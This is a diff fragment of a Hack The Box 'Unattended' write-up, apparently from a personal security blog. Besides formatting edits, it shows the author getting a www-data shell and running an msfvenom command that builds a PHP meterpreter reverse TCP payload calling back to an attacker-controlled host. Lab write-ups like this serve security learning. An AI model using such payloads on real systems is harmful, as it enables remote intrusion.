0xRick/0xRick.github.io/_posts/2019-8-24-unattended.md

 Upgrade-Insecure-Requests: 1
 Cache-Control: max-age=0
 ```
-#### And we get a shell as `www-data` :
+<br> And we get a shell as `www-data` :
 ![](/images/hackthebox/unattended/16.png)
-#### But I didn't like 2 things about this shell.
+<br> But I didn't like 2 things about this shell.
 First thing, it wasn't a tty shell.
 Second thing, with only 2 ports available It was annoying because I usually need more shells.
 So I created a `php` `meterpreter` payload because with `meterpreter` I can spawn as many shells as I want and they can be tty shells.
 ```
 root@kali:~/Desktop/HTB/boxes/unattended# msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.xx.xx LPORT=80 > shell.php
 [-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload